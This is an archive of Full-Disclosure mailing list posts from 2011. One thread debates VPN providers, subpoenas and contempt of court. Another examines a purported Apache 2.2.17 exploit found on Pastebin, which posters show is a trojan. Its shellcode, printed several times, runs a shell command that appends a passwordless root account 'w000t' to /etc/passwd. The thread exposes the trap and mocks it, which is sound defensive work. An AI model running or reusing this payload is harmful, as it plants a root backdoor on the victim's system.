http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Tue, 04 Oct 2011 20:35:16 CDT, adam said: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? tl;dr: Doesn't matter, you can end up in the slammer anyhow. Actually, the general rule is that if it's a civil proceeding it's only civil contempt. Refusing to comply with warrants or subpoenas pursuant to a criminal proceeding could very well get you criminal contempt. And even in civil proceedings the judge can stick you in jail till you decide to change your mind. And we're certainly discussing a criminal proceeding here. Journalist Judith Miller got to spend 4 months in jail for refusing to cooperate with a grand jury investigation. https://secure.wikimedia.org/wikipedia/en/wiki/Judith_Miller_(journalist)#Contempt_of_court And this dude spent 14 years in jail on a *civil* contempt charge: https://secure.wikimedia.org/wikipedia/en/wiki/H._Beatty_Chadwick pgpEXbArtr4nE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
the judge can stick you in jail till you decide to change your mind. That sums up the point entirely. In ALL of those cases, a judge deemed [whatever] contempt - law enforcement *did not*. On Tue, Oct 4, 2011 at 8:53 PM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 20:35:16 CDT, adam said: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? tl;dr: Doesn't matter, you can end up in the slammer anyhow. Actually, the general rule is that if it's a civil proceeding it's only civil contempt. Refusing to comply with warrants or subpoenas pursuant to a criminal proceeding could very well get you criminal contempt. And even in civil proceedings the judge can stick you in jail till you decide to change your mind. And we're certainly discussing a criminal proceeding here. Journalist Judith Miller got to spend 4 months in jail for refusing to cooperate with a grand jury investigation. https://secure.wikimedia.org/wikipedia/en/wiki/Judith_Miller_(journalist)#Contempt_of_court And this dude spent 14 years in jail on a *civil* contempt charge: https://secure.wikimedia.org/wikipedia/en/wiki/H._Beatty_Chadwick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On 10/4/2011 6:50 PM, adam wrote: That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. I'm curious as to what you think would cause contempt to be a criminal offense, especially in that example. Secondly, without the appropriate warrant - they couldn't legally take anything. If they disregarded that truth and did so anyway, they'd open themselves up to a pretty big lawsuit for violating that individual's civil rights as well as due process. Not to mention, anything found would likely end up being inadmissible because it was obtained illegally. On Tue, Oct 4, 2011 at 10:39 PM, Laurelai laure...@oneechan.org mailto:laure...@oneechan.org wrote: On 10/4/2011 6:35 PM, adam wrote: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu mailto:valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com mailto:tyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -http://secunia.com/ That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm And they can hold you indefinitely until you comply, or use your lack of compliance as reasonable suspicion to get that warrant, oh and lets not forget that they are declaring kids cyber terrorists and then the patriot act takes effect in cases of suspicion of terrorism, when that happens you don't have any rights anymore. Realistically we should stop calling them rights since they aren't really rights, they are privileges that can be revoked at government convenience. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
char evil[] = xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89 x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89 x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8 xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23 x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74 x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68 x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64 x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44 x44x44 . execl(/bin/sh, sh, -c, evil, 0); . /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd AHUH. On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e [1] Thanks :) ~Darren * char evil[] = * xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89 * x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89 * x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8 * xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23 * x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74 * x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a * x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68 * x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64 * x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44 * x44x44; Links: -- [1] http://pastebin.com/ygByEV2e ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... or i maybe wrong. cheers xd On 5 October 2011 15:10, Laurelai laure...@oneechan.org wrote: On 10/4/2011 6:50 PM, adam wrote: That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. I'm curious as to what you think would cause contempt to be a criminal offense, especially in that example. Secondly, without the appropriate warrant - they couldn't legally take anything. If they disregarded that truth and did so anyway, they'd open themselves up to a pretty big lawsuit for violating that individual's civil rights as well as due process. Not to mention, anything found would likely end up being inadmissible because it was obtained illegally. On Tue, Oct 4, 2011 at 10:39 PM, Laurelai laure...@oneechan.org wrote: On 10/4/2011 6:35 PM, adam wrote: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm And they can hold you indefinitely until you comply, or use your lack of compliance as reasonable suspicion to get that warrant, oh and lets not forget that they are declaring kids cyber terrorists and then the patriot act takes effect in cases of suspicion of terrorism, when that happens you don't have any rights anymore. Realistically we should stop calling them rights since they aren't really rights, they are privileges that can be revoked at government convenience. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
yer it is clarly leet stuff dude... i ran it and got liek 2000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote: ** char evil[] = \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47 \x89 \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51 \x89 \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80 \xe8 \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63 \x23 \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30 \x74 \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65 \x3a \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73 \x68 \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77 \x64 \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44 \x44 \x44\x44 . execl(/bin/sh, sh, -c, evil, 0); . /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd AHUH. On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren 1. char evil[] = 2. \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88 \x46\x47\x89 3. \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89 \x5e\x51\x89 4. \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55 \xcd\x80\xe8 5. \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23 \x2d\x63\x23 6. \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30 \x30\x30\x74 7. \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30 \x64\x65\x3a 8. \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62 \x61\x73\x68 9. \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73 \x73\x77\x64 10. \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43 \x43\x44\x44 11. \x44\x44; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm Did you actually read the link you pasted? [...] and criminal penalties *may not be imposed on someone who has not been afforded the protections* that the Constitution requires of such criminal proceedings [...] protections include the right [..] Then take a look at the actual rights being referenced. Most of which *would be violated* as a result. In response to 0x41 This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... No, you're absolutely right. That's the point here. Contempt is attached to the previous court order, there wouldn't be a new judge/new case for the contempt charge alone. All of it is circumstantial anyway, especially due to how much power judges actually have (in both criminal AND civil proceedings). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Wow, I'm extremely impressed with the support that the developer of this exploit offers. I had been trying to get the exploit to work for about an hour or so (couldn't get root on the target) and noticed that the developer of this exploit logged into my machine (using an old account I must have set up a while ago named w000t). I couldn't believe it when I saw that he was logging in to fix the problem, I've NEVER gotten that kind of support even out of paid software. He's been logged in for a couple of hours now, and I've noticed that he's downloaded/uploaded quite a bit (probably downloading the log files and then uploading patches) so I'm just gonna wait it out. I definitely have a good feeling about this though. On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 sec...@gmail.com wrote: yer it is clarly leet stuff dude... i ran it and got liek 2000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote: ** char evil[] = \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47 \x89 \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51 \x89 \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80 \xe8 \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63 \x23 \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30 \x74 \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65 \x3a \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73 \x68 \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77 \x64 \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44 \x44 \x44\x44 . execl(/bin/sh, sh, -c, evil, 0); . /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd AHUH. On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren 1. char evil[] = 2. \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88 \x46\x47\x89 3. \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89 \x5e\x51\x89 4. \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55 \xcd\x80\xe8 5. \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23 \x2d\x63\x23 6. \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30 \x30\x30\x74 7. \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30 \x64\x65\x3a 8. \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62 \x61\x73\x68 9. \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73 \x73\x77\x64 10. \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43 \x43\x44\x44 11. \x44\x44; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Its frightening how much power judges have, and how poorly they are overseen. Definitely agree there. Some of the civil cases are disgustingly bad, due to there being no media attention and no real oversight. The civil case mentioned above is a good example, and all of the excessive child support orders even further that. On topic: I haven't read every single reply here, but from what I've seen: no one has mentioned the VPN provider being held personally responsible. Being that the attacks originated from machines they own, if they failed to turn over user information, could it really be that difficult to pin the attacks on them and convince a judge that they were responsible? On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 4, 2011 at 10:32 PM, adam a...@papsy.net wrote: http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm Did you actually read the link you pasted? [...] and criminal penalties may not be imposed on someone who has not been afforded the protections that the Constitution requires of such criminal proceedings [...] protections include the right [..] Then take a look at the actual rights being referenced. Most of which would be violated as a result. In response to 0x41 This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... No, you're absolutely right. That's the point here. Contempt is attached to the previous court order, there wouldn't be a new judge/new case for the contempt charge alone. All of it is circumstantial anyway, especially due to how much power judges actually have (in both criminal AND civil proceedings). Its frightening how much power judges have, and how poorly they are overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not a local judge in a hillbilly town). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On 10/4/2011 7:50 PM, Jeffrey Walton wrote: On Tue, Oct 4, 2011 at 10:19 PM, xD 0x41sec...@gmail.com wrote: This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... or i maybe wrong. cheers Yep. Though some are probably not nice people, the Guantanamo Bay detainees were denied US Constitutional Rights (so said the US Supreme Court, 3 times). The folks who perverted our highest laws and precepts were not brought up on charges, or even censored. Sparta had it right: put the politicians on trial for their [alleged] crimes when their term is up. Who are the real terrorist against our [US] democracy? Jeff On 5 October 2011 15:10, Laurelailaure...@oneechan.org wrote: On 10/4/2011 6:50 PM, adam wrote: That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. I'm curious as to what you think would cause contempt to be a criminal offense, especially in that example. Secondly, without the appropriate warrant - they couldn't legally take anything. If they disregarded that truth and did so anyway, they'd open themselves up to a pretty big lawsuit for violating that individual's civil rights as well as due process. Not to mention, anything found would likely end up being inadmissible because it was obtained illegally. On Tue, Oct 4, 2011 at 10:39 PM, Laurelailaure...@oneechan.org wrote: On 10/4/2011 6:35 PM, adam wrote: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is not a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM,valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacstyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm And they can hold you indefinitely until you comply, or use your lack of compliance as reasonable suspicion to get that warrant, oh and lets not forget that they are declaring kids cyber terrorists and then the patriot act takes effect in cases of suspicion of terrorism, when that happens you don't have any rights anymore. Realistically we should stop calling them rights since they aren't really rights, they are privileges that can be revoked at government convenience. Good point Jeff, the real question is what does one do to fix it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Good point Jeff, the real question is what does one do to fix it? http://www.google.com/search?q=related:www.aclu.org On Wed, Oct 5, 2011 at 12:00 AM, Laurelai laure...@oneechan.org wrote: On 10/4/2011 7:50 PM, Jeffrey Walton wrote: On Tue, Oct 4, 2011 at 10:19 PM, xD 0x41sec...@gmail.com wrote: This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... or i maybe wrong. cheers Yep. Though some are probably not nice people, the Guantanamo Bay detainees were denied US Constitutional Rights (so said the US Supreme Court, 3 times). The folks who perverted our highest laws and precepts were not brought up on charges, or even censored. Sparta had it right: put the politicians on trial for their [alleged] crimes when their term is up. Who are the real terrorist against our [US] democracy? Jeff On 5 October 2011 15:10, Laurelailaure...@oneechan.org wrote: On 10/4/2011 6:50 PM, adam wrote: That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. I'm curious as to what you think would cause contempt to be a criminal offense, especially in that example. Secondly, without the appropriate warrant - they couldn't legally take anything. If they disregarded that truth and did so anyway, they'd open themselves up to a pretty big lawsuit for violating that individual's civil rights as well as due process. Not to mention, anything found would likely end up being inadmissible because it was obtained illegally. On Tue, Oct 4, 2011 at 10:39 PM, Laurelailaure...@oneechan.org wrote: On 10/4/2011 6:35 PM, adam wrote: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is not a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM,valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacstyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm And they can hold you indefinitely until you comply, or use your lack of compliance as reasonable suspicion to get that warrant, oh and lets not forget that they are declaring kids cyber terrorists and then the patriot act takes effect in cases of suspicion of terrorism, when that happens you don't have any rights anymore. Realistically we should stop calling them rights since they aren't really rights, they are privileges that can be revoked at government convenience. Good point Jeff, the real question is what does one do to fix it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On 10/4/2011 7:52 PM, adam wrote: Its frightening how much power judges have, and how poorly they are overseen. Definitely agree there. Some of the civil cases are disgustingly bad, due to there being no media attention and no real oversight. The civil case mentioned above is a good example, and all of the excessive child support orders even further that. On topic: I haven't read every single reply here, but from what I've seen: no one has mentioned the VPN provider being held personally responsible. Being that the attacks originated from machines they own, if they failed to turn over user information, could it really be that difficult to pin the attacks on them and convince a judge that they were responsible? On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton noloa...@gmail.com mailto:noloa...@gmail.com wrote: On Tue, Oct 4, 2011 at 10:32 PM, adam a...@papsy.net mailto:a...@papsy.net wrote: http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm Did you actually read the link you pasted? [...] and criminal penalties may not be imposed on someone who has not been afforded the protections that the Constitution requires of such criminal proceedings [...] protections include the right [..] Then take a look at the actual rights being referenced. Most of which would be violated as a result. In response to 0x41 This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... No, you're absolutely right. That's the point here. Contempt is attached to the previous court order, there wouldn't be a new judge/new case for the contempt charge alone. All of it is circumstantial anyway, especially due to how much power judges actually have (in both criminal AND civil proceedings). Its frightening how much power judges have, and how poorly they are overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not a local judge in a hillbilly town). Jeff Also a good point. On the flip side would it be that hard for a malicious person who works at a VPN provider to blame it on a customer? I don't think that's what has happened in this case, but hypothetically what is to stop a rouge employee from abusing the trust that a LE official might have and doctoring logs sent to them? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
I dunno china offers usa that kind of support all the time . or so i heard On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote: Wow, I'm extremely impressed with the support that the developer of this exploit offers. I had been trying to get the exploit to work for about an hour or so (couldn't get root on the target) and noticed that the developer of this exploit logged into my machine (using an old account I must have set up a while ago named w000t). I couldn't believe it when I saw that he was logging in to fix the problem, I've NEVER gotten that kind of support even out of paid software. He's been logged in for a couple of hours now, and I've noticed that he's downloaded/uploaded quite a bit (probably downloading the log files and then uploading patches) so I'm just gonna wait it out. I definitely have a good feeling about this though. On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 wrote: yer it is clarly leet stuff dude... i ran it and got liek 2000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS wrote: char evil[] = xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89 x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89 x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8 xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23 x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74 x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68 x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64 x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44 x44x44 . execl(/bin/sh, sh, -c, evil, 0); . /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd AHUH. On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test 